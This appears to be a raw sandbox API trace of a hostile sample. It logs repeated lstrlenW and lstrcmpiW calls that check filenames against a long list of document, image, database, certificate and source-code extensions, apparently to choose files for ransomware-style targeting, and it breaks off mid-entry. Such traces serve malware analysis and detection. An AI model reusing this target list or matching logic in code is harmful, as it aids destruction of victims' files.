lstrlenW (lpString=".adb") returned 4 [0289.104] lstrcmpiW (lpString1=".adb", lpString2=".WMF") returned -1 [0289.104] lstrlenW (lpString=".adp") returned 4 [0289.104] lstrcmpiW (lpString1=".adp", lpString2=".WMF") returned -1 [0289.104] lstrlenW (lpString=".ai") returned 3 [0289.104] lstrcmpiW (lpString1=".ai", lpString2="WMF") returned -1 [0289.104] lstrlenW (lpString=".ai3") returned 4 [0289.104] lstrcmpiW (lpString1=".ai3", lpString2=".WMF") returned -1 [0289.104] lstrlenW (lpString=".ai4") returned 4 [0289.104] lstrcmpiW (lpString1=".ai4", lpString2=".WMF") returned -1 [0289.105] lstrlenW (lpString=".ai5") returned 4 [0289.105] lstrcmpiW (lpString1=".ai5", lpString2=".WMF") returned -1 [0289.105] lstrlenW (lpString=".ai6") returned 4 [0289.105] lstrcmpiW (lpString1=".ai6", lpString2=".WMF") returned -1 [0289.105] lstrlenW (lpString=".ai7") returned 4 [0289.105] lstrcmpiW (lpString1=".ai7", lpString2=".WMF") returned -1 [0289.105] lstrlenW (lpString=".ai8") returned 4 [0289.105] lstrcmpiW (lpString1=".ai8", lpString2=".WMF") returned -1 [0289.105] lstrlenW (lpString=".anim") returned 5 [0289.105] lstrcmpiW (lpString1=".anim", lpString2="_.WMF") returned -1 [0289.105] lstrlenW (lpString=".arw") returned 4 [0289.105] lstrcmpiW (lpString1=".arw", lpString2=".WMF") returned -1 [0289.105] lstrlenW (lpString=".as") returned 3 [0289.106] lstrcmpiW (lpString1=".as", lpString2="WMF") returned -1 [0289.106] lstrlenW (lpString=".asa") returned 4 [0289.106] lstrcmpiW (lpString1=".asa", lpString2=".WMF") returned -1 [0289.106] lstrlenW (lpString=".asc") returned 4 [0289.106] lstrcmpiW (lpString1=".asc", lpString2=".WMF") returned -1 [0289.106] lstrlenW (lpString=".ascx") returned 5 [0289.106] lstrcmpiW (lpString1=".ascx", lpString2="_.WMF") returned -1 [0289.106] lstrlenW (lpString=".asm") returned 4 [0289.106] lstrcmpiW (lpString1=".asm", lpString2=".WMF") returned -1 [0289.106] lstrlenW (lpString=".asmx") returned 5 [0289.107] lstrcmpiW (lpString1=".asmx", lpString2="_.WMF") returned -1 [0289.107] lstrlenW (lpString=".asp") returned 4 [0289.107] lstrcmpiW (lpString1=".asp", lpString2=".WMF") returned -1 [0289.107] lstrlenW (lpString=".aspx") returned 5 [0289.107] lstrcmpiW (lpString1=".aspx", lpString2="_.WMF") returned -1 [0289.107] lstrlenW (lpString=".asr") returned 4 [0289.107] lstrcmpiW (lpString1=".asr", lpString2=".WMF") returned -1 [0289.107] lstrlenW (lpString=".asx") returned 4 [0289.107] lstrcmpiW (lpString1=".asx", lpString2=".WMF") returned -1 [0289.107] lstrlenW (lpString=".avi") returned 4 [0289.107] lstrcmpiW (lpString1=".avi", lpString2=".WMF") returned -1 [0289.107] lstrlenW (lpString=".avs") returned 4 [0289.107] lstrcmpiW (lpString1=".avs", lpString2=".WMF") returned -1 [0289.107] lstrlenW (lpString=".backup") returned 7 [0289.107] lstrcmpiW (lpString1=".backup", lpString2="08_.WMF") returned -1 [0289.108] lstrlenW (lpString=".bak") returned 4 [0289.108] lstrcmpiW (lpString1=".bak", lpString2=".WMF") returned -1 [0289.108] lstrlenW (lpString=".bay") returned 4 [0289.108] lstrcmpiW (lpString1=".bay", lpString2=".WMF") returned -1 [0289.108] lstrlenW (lpString=".bd") returned 3 [0289.108] lstrcmpiW (lpString1=".bd", lpString2="WMF") returned -1 [0289.108] lstrlenW (lpString=".bin") returned 4 [0289.108] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0289.108] lstrlenW (lpString=".bmp") returned 4 [0289.108] lstrcmpiW (lpString1=".bmp", lpString2=".WMF") returned -1 [0289.108] lstrlenW (lpString=".bz2") returned 4 [0289.108] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0289.108] lstrlenW (lpString=".c") returned 2 [0289.108] lstrcmpiW (lpString1=".c", lpString2="MF") returned -1 [0289.108] lstrlenW (lpString=".cdr") returned 4 [0289.108] lstrcmpiW (lpString1=".cdr", lpString2=".WMF") returned -1 [0289.108] lstrlenW (lpString=".cer") returned 4 [0289.108] lstrcmpiW (lpString1=".cer", lpString2=".WMF") returned -1 [0289.109] lstrlenW (lpString=".cf") returned 3 [0289.109] lstrcmpiW (lpString1=".cf", lpString2="WMF") returned -1 [0289.109] lstrlenW (lpString=".cfc") returned 4 [0289.109] lstrcmpiW (lpString1=".cfc", lpString2=".WMF") returned -1 [0289.109] lstrlenW (lpString=".cfm") returned 4 [0289.109] lstrcmpiW (lpString1=".cfm", lpString2=".WMF") returned -1 [0289.109] lstrlenW (lpString=".cfml") returned 5 [0289.109] lstrcmpiW (lpString1=".cfml", lpString2="_.WMF") returned -1 [0289.109] lstrlenW (lpString=".cfu") returned 4 [0289.109] lstrcmpiW (lpString1=".cfu", lpString2=".WMF") returned -1 [0289.109] lstrlenW (lpString=".chm") returned 4 [0289.109] lstrcmpiW (lpString1=".chm", lpString2=".WMF") returned -1 [0289.109] lstrlenW (lpString=".cin") returned 4 [0289.109] lstrcmpiW (lpString1=".cin", lpString2=".WMF") returned -1 [0289.109] lstrlenW (lpString=".class") returned 6 [0289.109] lstrcmpiW (lpString1=".class", lpString2="8_.WMF") returned -1 [0289.109] lstrlenW (lpString=".clx") returned 4 [0289.109] lstrcmpiW (lpString1=".clx", lpString2=".WMF") returned -1 [0289.109] lstrlenW (lpString=".config") returned 7 [0289.110] lstrcmpiW (lpString1=".config", lpString2="08_.WMF") returned -1 [0289.110] lstrlenW (lpString=".cpp") returned 4 [0289.110] lstrcmpiW (lpString1=".cpp", lpString2=".WMF") returned -1 [0289.110] lstrlenW (lpString=".cr2") returned 4 [0289.110] lstrcmpiW (lpString1=".cr2", lpString2=".WMF") returned -1 [0289.110] lstrlenW (lpString=".crt") returned 4 [0289.110] lstrcmpiW (lpString1=".crt", lpString2=".WMF") returned -1 [0289.110] lstrlenW (lpString=".crw") returned 4 [0289.110] lstrcmpiW (lpString1=".crw", lpString2=".WMF") returned -1 [0289.110] lstrlenW (lpString=".cs") returned 3 [0289.110] lstrcmpiW (lpString1=".cs", lpString2="WMF") returned -1 [0289.110] lstrlenW (lpString=".css") returned 4 [0289.110] lstrcmpiW (lpString1=".css", lpString2=".WMF") returned -1 [0289.111] lstrlenW (lpString=".csv") returned 4 [0289.111] lstrcmpiW (lpString1=".csv", lpString2=".WMF") returned -1 [0289.111] lstrlenW (lpString=".cub") returned 4 [0289.111] lstrcmpiW (lpString1=".cub", lpString2=".WMF") returned -1 [0289.111] lstrlenW (lpString=".dae") returned 4 [0289.111] lstrcmpiW (lpString1=".dae", lpString2=".WMF") returned -1 [0289.111] lstrlenW (lpString=".dat") returned 4 [0289.111] lstrcmpiW (lpString1=".dat", lpString2=".WMF") returned -1 [0289.111] lstrlenW (lpString=".db") returned 3 [0289.111] lstrcmpiW (lpString1=".db", lpString2="WMF") returned -1 [0289.111] lstrlenW (lpString=".dbf") returned 4 [0289.111] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0289.111] lstrlenW (lpString=".dbx") returned 4 [0289.111] lstrcmpiW (lpString1=".dbx", lpString2=".WMF") returned -1 [0289.111] lstrlenW (lpString=".dc3") returned 4 [0289.112] lstrcmpiW (lpString1=".dc3", lpString2=".WMF") returned -1 [0289.112] lstrlenW (lpString=".dcm") returned 4 [0289.112] lstrcmpiW (lpString1=".dcm", lpString2=".WMF") returned -1 [0289.112] lstrlenW (lpString=".dcr") returned 4 [0289.112] lstrcmpiW (lpString1=".dcr", lpString2=".WMF") returned -1 [0289.112] lstrlenW (lpString=".der") returned 4 [0289.112] lstrcmpiW (lpString1=".der", lpString2=".WMF") returned -1 [0289.112] lstrlenW (lpString=".dib") returned 4 [0289.112] lstrcmpiW (lpString1=".dib", lpString2=".WMF") returned -1 [0289.112] lstrlenW (lpString=".dic") returned 4 [0289.112] lstrcmpiW (lpString1=".dic", lpString2=".WMF") returned -1 [0289.112] lstrlenW (lpString=".dif") returned 4 [0289.112] lstrcmpiW (lpString1=".dif", lpString2=".WMF") returned -1 [0289.112] lstrlenW (lpString=".divx") returned 5 [0289.112] lstrcmpiW (lpString1=".divx", lpString2="_.WMF") returned -1 [0289.112] lstrlenW (lpString=".djvu") returned 5 [0289.112] lstrcmpiW (lpString1=".djvu", lpString2="_.WMF") returned -1 [0289.112] lstrlenW (lpString=".dng") returned 4 [0289.112] lstrcmpiW (lpString1=".dng", lpString2=".WMF") returned -1 [0289.113] lstrlenW (lpString=".doc") returned 4 [0289.113] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0289.113] lstrlenW (lpString=".docm") returned 5 [0289.113] lstrcmpiW (lpString1=".docm", lpString2="_.WMF") returned -1 [0289.113] lstrlenW (lpString=".docx") returned 5 [0289.113] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0289.113] lstrlenW (lpString=".dot") returned 4 [0289.113] lstrcmpiW (lpString1=".dot", lpString2=".WMF") returned -1 [0289.113] lstrlenW (lpString=".dotm") returned 5 [0289.113] lstrcmpiW (lpString1=".dotm", lpString2="_.WMF") returned -1 [0289.113] lstrlenW (lpString=".dotx") returned 5 [0289.113] lstrcmpiW (lpString1=".dotx", lpString2="_.WMF") returned -1 [0289.113] lstrlenW (lpString=".dpx") returned 4 [0289.113] lstrcmpiW (lpString1=".dpx", lpString2=".WMF") returned -1 [0289.113] lstrlenW (lpString=".dqy") returned 4 [0289.113] lstrcmpiW (lpString1=".dqy", lpString2=".WMF") returned -1 [0289.113] lstrlenW (lpString=".dsn") returned 4 [0289.113] lstrcmpiW (lpString1=".dsn", lpString2=".WMF") returned -1 [0289.113] lstrlenW (lpString=".dt") returned 3 [0289.113] lstrcmpiW (lpString1=".dt", lpString2="WMF") returned -1 [0289.114] lstrlenW (lpString=".dtd") returned 4 [0289.114] lstrcmpiW (lpString1=".dtd", lpString2=".WMF") returned -1 [0289.114] lstrlenW (lpString=".dwg") returned 4 [0289.114] lstrcmpiW (lpString1=".dwg", lpString2=".WMF") returned -1 [0289.114] lstrlenW (lpString=".dwt") returned 4 [0289.114] lstrcmpiW (lpString1=".dwt", lpString2=".WMF") returned -1 [0289.114] lstrlenW (lpString=".dx") returned 3 [0289.114] lstrcmpiW (lpString1=".dx", lpString2="WMF") returned -1 [0289.114] lstrlenW (lpString=".dxf") returned 4 [0289.114] lstrcmpiW (lpString1=".dxf", lpString2=".WMF") returned -1 [0289.114] lstrlenW (lpString=".edml") returned 5 [0289.114] lstrcmpiW (lpString1=".edml", lpString2="_.WMF") returned -1 [0289.114] lstrlenW (lpString=".efd") returned 4 [0289.114] lstrcmpiW (lpString1=".efd", lpString2=".WMF") returned -1 [0289.114] lstrlenW (lpString=".elf") returned 4 [0289.114] lstrcmpiW (lpString1=".elf", lpString2=".WMF") returned -1 [0289.114] lstrlenW (lpString=".emf") returned 4 [0289.114] lstrcmpiW (lpString1=".emf", lpString2=".WMF") returned -1 [0289.114] lstrlenW (lpString=".emz") returned 4 [0289.114] lstrcmpiW (lpString1=".emz", lpString2=".WMF") returned -1 [0289.115] lstrlenW (lpString=".epf") returned 4 [0289.115] lstrcmpiW (lpString1=".epf", lpString2=".WMF") returned -1 [0289.115] lstrlenW (lpString=".eps") returned 4 [0289.115] lstrcmpiW (lpString1=".eps", lpString2=".WMF") returned -1 [0289.115] lstrlenW (lpString=".epsf") returned 5 [0289.115] lstrcmpiW (lpString1=".epsf", lpString2="_.WMF") returned -1 [0289.115] lstrlenW (lpString=".epsp") returned 5 [0289.115] lstrcmpiW (lpString1=".epsp", lpString2="_.WMF") returned -1 [0289.115] lstrlenW (lpString=".erf") returned 4 [0289.115] lstrcmpiW (lpString1=".erf", lpString2=".WMF") returned -1 [0289.115] lstrlenW (lpString=".exr") returned 4 [0289.115] lstrcmpiW (lpString1=".exr", lpString2=".WMF") returned -1 [0289.115] lstrlenW (lpString=".f4v") returned 4 [0289.115] lstrcmpiW (lpString1=".f4v", lpString2=".WMF") returned -1 [0289.115] lstrlenW (lpString=".fido") returned 5 [0289.115] lstrcmpiW (lpString1=".fido", lpString2="_.WMF") returned -1 [0289.115] lstrlenW (lpString=".flm") returned 4 [0289.116] lstrcmpiW (lpString1=".flm", lpString2=".WMF") returned -1 [0289.116] lstrlenW (lpString=".flv") returned 4 [0289.116] lstrcmpiW (lpString1=".flv", lpString2=".WMF") returned -1 [0289.116] lstrlenW (lpString=".frm") returned 4 [0289.116] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0289.116] lstrlenW (lpString=".fxg") returned 4 [0289.116] lstrcmpiW (lpString1=".fxg", lpString2=".WMF") returned -1 [0289.116] lstrlenW (lpString=".geo") returned 4 [0289.116] lstrcmpiW (lpString1=".geo", lpString2=".WMF") returned -1 [0289.116] lstrlenW (lpString=".gif") returned 4 [0289.116] lstrcmpiW (lpString1=".gif", lpString2=".WMF") returned -1 [0289.116] lstrlenW (lpString=".grs") returned 4 [0289.116] lstrcmpiW (lpString1=".grs", lpString2=".WMF") returned -1 [0289.116] lstrlenW (lpString=".gz") returned 3 [0289.116] lstrcmpiW (lpString1=".gz", lpString2="WMF") returned -1 [0289.116] lstrlenW (lpString=".h") returned 2 [0289.116] lstrcmpiW (lpString1=".h", lpString2="MF") returned -1 [0289.117] lstrlenW (lpString=".hdr") returned 4 [0289.117] lstrcmpiW (lpString1=".hdr", lpString2=".WMF") returned -1 [0289.117] lstrlenW (lpString=".hpp") returned 4 [0289.117] lstrcmpiW (lpString1=".hpp", lpString2=".WMF") returned -1 [0289.117] lstrlenW (lpString=".hta") returned 4 [0289.117] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0289.117] lstrlenW (lpString=".htc") returned 4 [0289.117] lstrcmpiW (lpString1=".htc", lpString2=".WMF") returned -1 [0289.117] lstrlenW (lpString=".htm") returned 4 [0289.117] lstrcmpiW (lpString1=".htm", lpString2=".WMF") returned -1 [0289.117] lstrlenW (lpString=".html") returned 5 [0289.117] lstrcmpiW (lpString1=".html", lpString2="_.WMF") returned -1 [0289.117] lstrlenW (lpString=".icb") returned 4 [0289.117] lstrcmpiW (lpString1=".icb", lpString2=".WMF") returned -1 [0289.117] lstrlenW (lpString=".ics") returned 4 [0289.117] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0289.117] lstrlenW (lpString=".iff") returned 4 [0289.117] lstrcmpiW (lpString1=".iff", lpString2=".WMF") returned -1 [0289.117] lstrlenW (lpString=".inc") returned 4 [0289.118] lstrcmpiW (lpString1=".inc", lpString2=".WMF") returned -1 [0289.118] lstrlenW (lpString=".indd") returned 5 [0289.118] lstrcmpiW (lpString1=".indd", lpString2="_.WMF") returned -1 [0289.118] lstrlenW (lpString=".ini") returned 4 [0289.118] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0289.118] lstrlenW (lpString=".iqy") returned 4 [0289.118] lstrcmpiW (lpString1=".iqy", lpString2=".WMF") returned -1 [0289.118] lstrlenW (lpString=".j2c") returned 4 [0289.118] lstrcmpiW (lpString1=".j2c", lpString2=".WMF") returned -1 [0289.118] lstrlenW (lpString=".j2k") returned 4 [0289.118] lstrcmpiW (lpString1=".j2k", lpString2=".WMF") returned -1 [0289.118] lstrlenW (lpString=".java") returned 5 [0289.118] lstrcmpiW (lpString1=".java", lpString2="_.WMF") returned -1 [0289.118] lstrlenW (lpString=".jp2") returned 4 [0289.118] lstrcmpiW (lpString1=".jp2", lpString2=".WMF") returned -1 [0289.118] lstrlenW (lpString=".jpc") returned 4 [0289.118] lstrcmpiW (lpString1=".jpc", lpString2=".WMF") returned -1 [0289.118] lstrlenW (lpString=".jpe") returned 4 [0289.118] lstrcmpiW (lpString1=".jpe", lpString2=".WMF") returned -1 [0289.118] lstrlenW (lpString=".jpeg") returned 5 [0289.118] lstrcmpiW (lpString1=".jpeg", lpString2="_.WMF") returned -1 [0289.119] lstrlenW (lpString=".jpf") returned 4 [0289.119] lstrcmpiW (lpString1=".jpf", lpString2=".WMF") returned -1 [0289.119] lstrlenW (lpString=".jpg") returned 4 [0289.119] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0289.119] lstrlenW (lpString=".jpx") returned 4 [0289.119] lstrcmpiW (lpString1=".jpx", lpString2=".WMF") returned -1 [0289.119] lstrlenW (lpString=".js") returned 3 [0289.119] lstrcmpiW (lpString1=".js", lpString2="WMF") returned -1 [0289.119] lstrlenW (lpString=".jsf") returned 4 [0289.119] lstrcmpiW (lpString1=".jsf", lpString2=".WMF") returned -1 [0289.119] lstrlenW (lpString=".json") returned 5 [0289.119] lstrcmpiW (lpString1=".json", lpString2="_.WMF") returned -1 [0289.119] lstrlenW (lpString=".jsp") returned 4 [0289.119] lstrcmpiW (lpString1=".jsp", lpString2=".WMF") returned -1 [0289.119] lstrlenW (lpString=".kdc") returned 4 [0289.119] lstrcmpiW (lpString1=".kdc", lpString2=".WMF") returned -1 [0289.119] lstrlenW (lpString=".kmz") returned 4 [0289.119] lstrcmpiW (lpString1=".kmz", lpString2=".WMF") returned -1 [0289.119] lstrlenW (lpString=".kwm") returned 4 [0289.119] lstrcmpiW (lpString1=".kwm", lpString2=".WMF") returned -1 [0289.120] lstrlenW (lpString=".lasso") returned 6 [0289.120] lstrcmpiW (lpString1=".lasso", lpString2="8_.WMF") returned -1 [0289.120] lstrlenW (lpString=".lbi") returned 4 [0289.120] lstrcmpiW (lpString1=".lbi", lpString2=".WMF") returned -1 [0289.120] lstrlenW (lpString=".lgf") returned 4 [0289.120] lstrcmpiW (lpString1=".lgf", lpString2=".WMF") returned -1 [0289.120] lstrlenW (lpString=".lgp") returned 4 [0289.120] lstrcmpiW (lpString1=".lgp", lpString2=".WMF") returned -1 [0289.120] lstrlenW (lpString=".log") returned 4 [0289.120] lstrcmpiW (lpString1=".log", lpString2=".WMF") returned -1 [0289.120] lstrlenW (lpString=".m1v") returned 4 [0289.120] lstrcmpiW (lpString1=".m1v", lpString2=".WMF") returned -1 [0289.120] lstrlenW (lpString=".m4a") returned 4 [0289.120] lstrcmpiW (lpString1=".m4a", lpString2=".WMF") returned -1 [0289.120] lstrlenW (lpString=".m4v") returned 4 [0289.120] lstrcmpiW (lpString1=".m4v", lpString2=".WMF") returned -1 [0289.120] lstrlenW (lpString=".max") returned 4 [0289.120] lstrcmpiW (lpString1=".max", lpString2=".WMF") returned -1 [0289.120] lstrlenW (lpString=".md") returned 3 [0289.120] lstrcmpiW (lpString1=".md", lpString2="WMF") returned -1 [0289.120] lstrlenW (lpString=".mda") returned 4 [0289.121] lstrcmpiW (lpString1=".mda", lpString2=".WMF") returned -1 [0289.121] lstrlenW (lpString=".mdb") returned 4 [0289.121] lstrcmpiW (lpString1=".mdb", lpString2=".WMF") returned -1 [0289.121] lstrlenW (lpString=".mde") returned 4 [0289.121] lstrcmpiW (lpString1=".mde", lpString2=".WMF") returned -1 [0289.121] lstrlenW (lpString=".mdf") returned 4 [0289.121] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0289.121] lstrlenW (lpString=".mdw") returned 4 [0289.121] lstrcmpiW (lpString1=".mdw", lpString2=".WMF") returned -1 [0289.121] lstrlenW (lpString=".mef") returned 4 [0289.121] lstrcmpiW (lpString1=".mef", lpString2=".WMF") returned -1 [0289.121] lstrlenW (lpString=".mft") returned 4 [0289.121] lstrcmpiW (lpString1=".mft", lpString2=".WMF") returned -1 [0289.121] lstrlenW (lpString=".mfw") returned 4 [0289.121] lstrcmpiW (lpString1=".mfw", lpString2=".WMF") returned -1 [0289.121] lstrlenW (lpString=".mht") returned 4 [0289.121] lstrcmpiW (lpString1=".mht", lpString2=".WMF") returned -1 [0289.121] lstrlenW (lpString=".mhtml") returned 6 [0289.121] lstrcmpiW (lpString1=".mhtml", lpString2="8_.WMF") returned -1 [0289.121] lstrlenW (lpString=".mka") returned 4 [0289.121] lstrcmpiW (lpString1=".mka", lpString2=".WMF") returned -1 [0289.614] lstrlenW (lpString=".mkidx") returned 6 [0289.614] lstrcmpiW (lpString1=".mkidx", lpString2="8_.WMF") returned -1 [0289.614] lstrlenW (lpString=".mkv") returned 4 [0289.614] lstrcmpiW (lpString1=".mkv", lpString2=".WMF") returned -1 [0289.614] lstrlenW (lpString=".mos") returned 4 [0289.614] lstrcmpiW (lpString1=".mos", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".mov") returned 4 [0289.615] lstrcmpiW (lpString1=".mov", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".mp3") returned 4 [0289.615] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".mp4") returned 4 [0289.615] lstrcmpiW (lpString1=".mp4", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".mpeg") returned 5 [0289.615] lstrcmpiW (lpString1=".mpeg", lpString2="_.WMF") returned -1 [0289.615] lstrlenW (lpString=".mpg") returned 4 [0289.615] lstrcmpiW (lpString1=".mpg", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".mpv") returned 4 [0289.615] lstrcmpiW (lpString1=".mpv", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".mrw") returned 4 [0289.615] lstrcmpiW (lpString1=".mrw", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".msg") returned 4 [0289.615] lstrcmpiW (lpString1=".msg", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".mxl") returned 4 [0289.615] lstrcmpiW (lpString1=".mxl", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".myd") returned 4 [0289.615] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0289.615] lstrlenW (lpString=".myi") returned 4 [0289.616] lstrcmpiW (lpString1=".myi", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".nef") returned 4 [0289.616] lstrcmpiW (lpString1=".nef", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".nrw") returned 4 [0289.616] lstrcmpiW (lpString1=".nrw", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".obj") returned 4 [0289.616] lstrcmpiW (lpString1=".obj", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".odb") returned 4 [0289.616] lstrcmpiW (lpString1=".odb", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".odc") returned 4 [0289.616] lstrcmpiW (lpString1=".odc", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".odm") returned 4 [0289.616] lstrcmpiW (lpString1=".odm", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".odp") returned 4 [0289.616] lstrcmpiW (lpString1=".odp", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".ods") returned 4 [0289.616] lstrcmpiW (lpString1=".ods", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".oft") returned 4 [0289.616] lstrcmpiW (lpString1=".oft", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".one") returned 4 [0289.616] lstrcmpiW (lpString1=".one", lpString2=".WMF") returned -1 [0289.616] lstrlenW (lpString=".onepkg") returned 7 [0289.617] lstrcmpiW (lpString1=".onepkg", lpString2="08_.WMF") returned -1 [0289.617] lstrlenW (lpString=".onetoc2") returned 8 [0289.617] lstrcmpiW (lpString1=".onetoc2", lpString2="808_.WMF") returned -1 [0289.617] lstrlenW (lpString=".opt") returned 4 [0289.617] lstrcmpiW (lpString1=".opt", lpString2=".WMF") returned -1 [0289.617] lstrlenW (lpString=".oqy") returned 4 [0289.617] lstrcmpiW (lpString1=".oqy", lpString2=".WMF") returned -1 [0289.617] lstrlenW (lpString=".orf") returned 4 [0289.617] lstrcmpiW (lpString1=".orf", lpString2=".WMF") returned -1 [0289.617] lstrlenW (lpString=".p12") returned 4 [0289.617] lstrcmpiW (lpString1=".p12", lpString2=".WMF") returned -1 [0289.617] lstrlenW (lpString=".p7b") returned 4 [0289.617] lstrcmpiW (lpString1=".p7b", lpString2=".WMF") returned -1 [0289.617] lstrlenW (lpString=".p7c") returned 4 [0289.617] lstrcmpiW (lpString1=".p7c", lpString2=".WMF") returned -1 [0289.617] lstrlenW (lpString=".pam") returned 4 [0289.617] lstrcmpiW (lpString1=".pam", lpString2=".WMF") returned -1 [0289.617] lstrlenW (lpString=".pbm") returned 4 [0289.617] lstrcmpiW (lpString1=".pbm", lpString2=".WMF") returned -1 [0289.617] lstrlenW (lpString=".pct") returned 4 [0289.617] lstrcmpiW (lpString1=".pct", lpString2=".WMF") returned -1 [0289.617] lstrlenW (lpString=".pcx") returned 4 [0289.617] lstrcmpiW (lpString1=".pcx", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".pdd") returned 4 [0289.618] lstrcmpiW (lpString1=".pdd", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".pdf") returned 4 [0289.618] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".pdp") returned 4 [0289.618] lstrcmpiW (lpString1=".pdp", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".pef") returned 4 [0289.618] lstrcmpiW (lpString1=".pef", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".pem") returned 4 [0289.618] lstrcmpiW (lpString1=".pem", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".pff") returned 4 [0289.618] lstrcmpiW (lpString1=".pff", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".pfm") returned 4 [0289.618] lstrcmpiW (lpString1=".pfm", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".pfx") returned 4 [0289.618] lstrcmpiW (lpString1=".pfx", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".pgm") returned 4 [0289.618] lstrcmpiW (lpString1=".pgm", lpString2=".WMF") returned -1 [0289.618] lstrlenW (lpString=".php") returned 4 [0289.618] lstrcmpiW (lpString1=".php", lpString2=".WMF") returned -1 [0289.619] lstrlenW (lpString=".php3") returned 5 [0289.619] lstrcmpiW (lpString1=".php3", lpString2="_.WMF") returned -1 [0289.619] lstrlenW (lpString=".php4") returned 5 [0289.619] lstrcmpiW (lpString1=".php4", lpString2="_.WMF") returned -1 [0289.619] lstrlenW (lpString=".php5") returned 5 [0289.619] lstrcmpiW (lpString1=".php5", lpString2="_.WMF") returned -1 [0289.619] lstrlenW (lpString=".phtml") returned 6 [0289.619] lstrcmpiW (lpString1=".phtml", lpString2="8_.WMF") returned -1 [0289.619] lstrlenW (lpString=".pict") returned 5 [0289.619] lstrcmpiW (lpString1=".pict", lpString2="_.WMF") returned -1 [0289.619] lstrlenW (lpString=".pl") returned 3 [0289.619] lstrcmpiW (lpString1=".pl", lpString2="WMF") returned -1 [0289.619] lstrlenW (lpString=".pls") returned 4 [0289.619] lstrcmpiW (lpString1=".pls", lpString2=".WMF") returned -1 [0289.619] lstrlenW (lpString=".pm") returned 3 [0289.619] lstrcmpiW (lpString1=".pm", lpString2="WMF") returned -1 [0289.619] lstrlenW (lpString=".png") returned 4 [0289.619] lstrcmpiW (lpString1=".png", lpString2=".WMF") returned -1 [0289.621] lstrlenW (lpString=".pnm") returned 4 [0289.621] lstrcmpiW (lpString1=".pnm", lpString2=".WMF") returned -1 [0289.689] lstrlenW (lpString=".pot") returned 4 [0289.689] lstrcmpiW (lpString1=".pot", lpString2=".WMF") returned -1 [0289.689] lstrlenW (lpString=".potm") returned 5 [0289.689] lstrcmpiW (lpString1=".potm", lpString2="_.WMF") returned -1 [0289.689] lstrlenW (lpString=".potx") returned 5 [0289.689] lstrcmpiW (lpString1=".potx", lpString2="_.WMF") returned -1 [0289.689] lstrlenW (lpString=".ppa") returned 4 [0289.689] lstrcmpiW (lpString1=".ppa", lpString2=".WMF") returned -1 [0289.689] lstrlenW (lpString=".ppam") returned 5 [0289.689] lstrcmpiW (lpString1=".ppam", lpString2="_.WMF") returned -1 [0289.689] lstrlenW (lpString=".ppm") returned 4 [0289.689] lstrcmpiW (lpString1=".ppm", lpString2=".WMF") returned -1 [0289.689] lstrlenW (lpString=".pps") returned 4 [0289.689] lstrcmpiW (lpString1=".pps", lpString2=".WMF") returned -1 [0289.690] lstrlenW (lpString=".ppsm") returned 5 [0289.690] lstrcmpiW (lpString1=".ppsm", lpString2="_.WMF") returned -1 [0289.690] lstrlenW (lpString=".ppt") returned 4 [0289.690] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0289.690] lstrlenW (lpString=".pptm") returned 5 [0289.690] lstrcmpiW (lpString1=".pptm", lpString2="_.WMF") returned -1 [0289.690] lstrlenW (lpString=".pptx") returned 5 [0289.690] lstrcmpiW (lpString1=".pptx", lpString2="_.WMF") returned -1 [0289.690] lstrlenW (lpString=".prn") returned 4 [0289.690] lstrcmpiW (lpString1=".prn", lpString2=".WMF") returned -1 [0289.690] lstrlenW (lpString=".ps") returned 3 [0289.690] lstrcmpiW (lpString1=".ps", lpString2="WMF") returned -1 [0289.690] lstrlenW (lpString=".psb") returned 4 [0289.690] lstrcmpiW (lpString1=".psb", lpString2=".WMF") returned -1 [0289.690] lstrlenW (lpString=".psd") returned 4 [0289.690] lstrcmpiW (lpString1=".psd", lpString2=".WMF") returned -1 [0289.690] lstrlenW (lpString=".pst") returned 4 [0289.690] lstrcmpiW (lpString1=".pst", lpString2=".WMF") returned -1 [0289.690] lstrlenW (lpString=".ptx") returned 4 [0289.690] lstrcmpiW (lpString1=".ptx", lpString2=".WMF") returned -1 [0289.690] lstrlenW (lpString=".pub") returned 4 [0289.690] lstrcmpiW 